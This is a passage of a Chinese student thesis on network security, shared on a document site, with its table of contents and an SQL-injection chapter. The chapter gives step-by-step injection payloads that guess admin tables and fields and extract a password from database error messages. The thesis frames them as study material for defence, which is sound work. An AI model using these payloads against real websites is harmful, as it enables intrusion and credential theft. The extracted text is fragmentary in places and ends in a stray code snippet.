计算机网络安全与维护论文精编版[60页].docx
《计算机网络安全与维护论文精编版[60页].docx》由会员分享,可在线阅读,更多相关《计算机网络安全与维护论文精编版[60页].docx(60页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、最新资料推荐计算机网络安全与维护专 业 计算机信息管理 班 级 数码嵌入式3-3班学 生 杨晓东 指导教师 魏西航 西安理工大学二 0 一一 年 五月摘要:网络安全技术随着黑客技术的发展而产生,我们在研究网络安全的时候首先应该研究黑客常用的入侵手段和攻击技术。因此本论文主要通过对黑客技术的研究来讲解网络安全防范,主要以揭露了黑客攻击的原理、攻击手段来推出相应该的安全防范措施。通过许多的攻击实例以及防范实例让人们掌握网络安全的基本防范技术、了解黑客攻击的原理和方法以及带来的危害,从而达到提高网络安全防范的意识和增强网络安全防范的能力。关键词:黑客;黑客技术;网络安全目 录第一章 概述 1.1、本
2、课题的来源1.2、本论文的目的、内容及作者主要贡献第二章 脚本漏洞2.1脚本漏洞形成的原因2.2 脚本漏洞之黑客工具分析2.3 脚本漏洞带来的危害2.4 Asp脚本漏洞带来的危害2.5 Php注入原理2.6 Php注入实例2.7 Php注入防范2.8 其他脚本注入防范第三章 网站旁注 3.1 网站旁注第四章 缓冲区溢出4.1 冲区溢出原理4.2 出攻击实例第五章 网络嗅探5.1 网络嗅探原理5.2 网络嗅探实例第六章 密码破解6.1 密码破解第七章 社会工程学7.1 Aminintrator致命的错误第八章 个人PC主机安全之木马篇7.1、木马的原理7.2、木马软件的介绍及简单的使用7.3、网
3、页木马第八章 个人PC主机安全之病毒8.1病毒 第九章 个人PC主机安全之漏洞9.1 漏洞致 谢参考文献第一章概述1、本题课题来源计算机网络是现代通信技术与计算机技术相结合的产物。所谓计算机网络,就是把分布在不同地理区域的计算机与专门的外部设备用通信线路互连成一个规模大、功能强的网络系统,从而使众多的计算机可以方便地互相传递信息,共享硬件、软件、数据信息等资源。从世界上第一台计算机诞生到今天互联网的日益普及,计算机的发展速度可谓突飞猛进,从而也把人类文明带入数码时代。计算机网络的出现,使人们在获取和传递信息时,又多了一种选择,而且是一种能够提供空前“自由化”的选择,它使信息的传播速度、质量与范
4、围在时间和空间上有了质的飞跃,从而使人们的许多梦想变成了现实。但是,辩证唯物主义认为,任何事物都是矛盾对立的统一体,尤其是对于正在发展中的新事物来说,更是如此。计算机网络也不例外。人们在享受着网络传输带给我们便利的同时,也对日露端倪的网络负面影响愈发担忧。开放的信息系统必然存在众多潜在的安全隐患,黑客和反黑客、破坏和反破坏的斗争仍将继续。在这样的斗争中,安全技术作为一个独特的领域越来越受到全球网络建设者的关注。随着网上的在线交易、互联星空冲值、网络游戏的发展、电子商务的发展,网络安全越来越关系着广大用户的切身利益。2、 本题客源的目的 目前网络在世界经济社会中占据着越来越重要的地位,已经不只为
5、了信息和数据的安全,甚至已经渗透到国家的政治、经济、社会、和军事之中。网络黑客,始终给人们蒙上了一层神秘的面纱,其实他们只不过是一群计算机技术的狂热爱好者,仅仅是利用了自己的技术技巧以及系统的漏洞和用户的弱点。本文主要批露目前流行的黑客攻击技术、揭露黑客技术的原理、介绍针对攻击的安全防范方法,用来提高大家的网络安全防范能力和安全防范意识。3、 本题内容主要框架主要通过对黑客技术的介绍来让大家了解黑客攻击的方式。攻与防是分不开的,我们只有在了解其攻击方式和原理后,才能真正更好的防御。本文主要分为两个大体内容:网站服务器安全和个人pc机安全,其中网站服务器安全主要介绍各种网站服务器的入侵方式和防范
6、方法:如脚本漏洞入侵、网络旁注、远程溢出、网络嗅探、社会工程学、ddos拒绝服务攻击等个人pc机安全:主要讲叙黑客入侵个人机常用的方法及防范,如木马技术、远程溢出、弱口令扫描、ipc管道、以及黑客到底想用我们的个人机干什么。具体内容我将以图文(一)并茂的方式展现出来,先看一下下面的“服务器安全之黑客攻击手段”框架:1图解一2Powered By Gisun 第二章 脚本漏洞2.1洞形成的原因 随着网络经济的复舒,开始越来越多的网站涌现出来,随着脚本漏洞的挖掘,黑客也越来越猖狂,并且越来越低龄化和傻瓜化。“你只要会用一个工具就可以黑站”,这就是脚本漏洞利的特点。这些漏洞的主要成因是编程程序员的素
7、质,往往在编写asp或php等程序时候对字符的过滤不严密,对注入漏洞不了解,或者某个参数忘记检查导致的。由于编写网页程序这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。我们看一个例子:在本机建一个基于iis的asp程序http:/localhost/test/show.a
8、sp?ID=3,将这个网址提交到服务器后,服务器将进行类似Select * from 表名 where 字段=&ID的查询(ID即客户端提交的参数,本例即是3),再将查询结果返回给客户端,如果这里客户端故意提交这么一个网址:http:/localhost/test/show.asp?ID=3 and user0,这时,服务器运行Select * from 表名 where 字段=444 and user0这样的查询,当然,这个语句是运行不下去的,肯定出错,错误信息如下:错误类型:Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)Mic
9、rosoftODBC SQL Server DriverSQL Server将 nvarchar 值 test 转换为数据类型为 int 的列时发生语法错误。/test/show.asp, 第 34 行从这个出错信息中,我们可以获得以下信息:该站使用MSSQL数据库,用ODBC连接,连接帐号名为:test。所谓SQL注入,就是利用程序员对用户输入数据的合法性检测不严或不检测的特点,故意从客户端提交特殊的代码,从而收集程序及服务器的信息,从而获取想得到的资料。通常别有用心者的目标是获取网站管理员的帐号和密码。比如当知道网站管理员帐号存在表login中,管理员帐号名为admin 想知道admin的
10、密码,这里接着从客户端提交这样一个网址:http:/localhost/test/show.asp?ID=4 and (Select password from login where user_name=admin)0,返回的出错信息如下:错误类型:Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)MicrosoftODBC SQL Server DriverSQL Server将 varchar 值 admin888 转换为数据类型为 int 的列时发生语法错误。/test/show.asp, 第 34 行现在出来了“admin8
11、88”就是管理员的密码!得到这个密码,这时您就可以用这个帐号和密码接管人家的网站了!当然我们并不知道帐号就在表login中,而且也不知道管理员名为admin,但这些不容难办到,我们可以写个工具进行猜解,速度很快就可以找到你想要的东西了。前面是有关mssql数据库的注入基础,我们再看一看acce数据库的注入基础:首先进行浏览器的设置,以保证手工注入时能返回出错信息。其操作步骤为:右键单击浏览器图标,选择“属性”,在弹出来的对话框中选择“高级”选项卡,接着去掉“显示友好的HTTP错误信息”前面的钩,最后点击“应用”按钮即可。对于sql注入得先找到注入点,注入点的判断方法为:通常打开一个类似如果出现
12、错误提示,则说明可能存在注入漏洞,再输入 and 1=1如果存在SQL注入漏洞,就可以查询数据库,1=1是一个恒等式可以忽略,因此会返回一个正常的页面,此页面和 and 1=2,1=2为一个恒不等式,如果该站点支持数据库查询,则大概会返回如下所示的信息:Microsoft vbscript 编译器错误 错误码率 800a03f6 缺少End/iishelp/common/500-100.asp,行242ADODB.Field 错误 800a0bcd一般出现以上信息就可以确定存在sql注入漏洞了。下面我们来看一下sql注入的过程分析: 如:打开:http:/hostlocal/test2/lis
13、t.asp?id=17在其后面加为http:/hostlocal/test2/list.asp?id=17出错!显示为:“数据库出错”。那么接下来我们便进行如下操作:1 猜管理员帐号表。2 猜相应表中的用户的字段名以及密码的字段名。3 猜出用户名的长度和密码的长度4 猜出用户和密码5 找到管理页面进入管理猜管理员的表:http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin)/min(id)返回表中ID最小值返回文章证明,有一个admin的表;如果没有返回文章,证明出错不存在admin这个表。猜用户的字段名:ht
14、tp:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where user=aaa)返回错误信息,表示没有user这个用户段名再来!http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where username=aaa)没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在username个字段,只是用户名不是aaa猜密码的字段名:http:/hostlocal/test2/list.asp?id=17 a
15、nd 1=(select min(id) from admin where passwd=aaa)返回错误信息表示没有passwd这个密码字段名。 再来:http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where password=aaa)没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在password这个字段,只是密码不是aaa猜用户字段名长度: http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from ad
16、min where len(username)5)正确http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)5)正确http:/hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(password)= and1Num then begin SqlResultMemo.Lines.Add(FieldName + 长度: 16); LengthInt := 16 end else
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 60页 计算机 网络安全 维护 论文 精编 60
限制150内